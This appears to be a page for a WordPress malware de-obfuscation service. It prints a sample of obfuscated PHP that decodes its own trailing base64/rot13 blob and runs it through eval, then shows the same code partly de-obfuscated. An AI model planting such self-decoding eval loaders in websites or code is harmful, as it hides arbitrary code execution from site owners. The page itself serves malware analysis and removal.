De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13(explode(base64_decode("Pz4="),file_get_contents(__FILE__))[1]))));$L7CRgr = "a7bc7b53beaf0626a2e47268c849b484";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=0UV78zMhyTWt4zp1EKMlOlBcxlWgpPV6NlWHqPV/NFXjNwZjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtpPqaNlCtxPZjVQZ4OQVzNlpgWKMjEPXbNlCtxFZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxvZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPAjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQAjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjDQZ4OQVzNlpgWKMjEPXbNlCtxPBjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZkNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZlNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQBjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjtQZ4OQVzNlpgWKMjEPXbNlCtxPZ0NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZ4NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZjRQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNFstfmW1qPV9Nloz5JnxNlrtH2pfITV9OlBaN3Wt0QViMzocEPV7OFXjNQZktUZt0GCtxPZjNGZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaZ2Wt0QViMzocEPV7OFXjNQZltUZt0GCtxPZjNwZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaD2Wt0QViMzocEPV7OFXjNQZ0tUZt0GCtxPZjNQA
<?php $L6CRgr = array("/x/i", "x", base64_decode(strrev(str_rot13(array(0 => "<?php \$L6CRgr=array(base64_decode(\"L3gvaQ==\"),base64_decode(\"eA==\"),base64_decode(strrev(str_rot13(explode(base64_decode(\"Pz4=\"),file_get_contents(__FILE__))[1]))));\$L7CRgr = \"a7bc7b53beaf0626a2e47268c849b484\";preg_replace(\$L6CRgr[0],serialize(eval(\$L6CRgr[2])),\$L6CRgr[1]);exit();", 1 => "=0UV78zMhyTWt4zp1EKMlOlBcxlWgpPV6NlWHqPV/NFXjNwZjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtpPqaNlCtxPZjVQZ4OQVzNlpgWKMjEPXbNlCtxFZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxvZjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPAjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQAjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjDQZ4OQVzNlpgWKMjEPXbNlCtxPBjNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZkNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZlNQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcxlWgpPV6NlWGqPV/NFXjNQBjtUZtLPVm1zpyOUWbtPV6NFXtpPraNvBtplpaNlCtxPZjtQZ4OQVzNlpgWKMjEPXbNlCtxPZ0NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtplqaNlCtxPZ4NQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNlBcpFYaNvBtpvpaNlCtxPZjRQZ4OQVzNlpgWKMjEPXbNFChNloz5JnxNFstfmW1qPV9Nloz5JnxNlrtH2pfITV9OlBaN3Wt0QViMzocEPV7OFXjNQZktUZt0GCtxPZjNGZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaZ2Wt0QViMzocEPV7OFXjNQZltUZt0GCtxPZjNwZ4OQVzNlpgWKMjEPXbNvMcI2pfITV9OlBaD2Wt0QViMzocEPV7OFXjNQZ0tUZt0GCtxPZjNQA")[1])))); $L7CRgr = "a7bc7b53beaf0626a2e47268c849b484"; preg_replace($L6CRgr[0], serialize(eval($L6CRgr[2])), $L6CRgr[1]); exit;
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.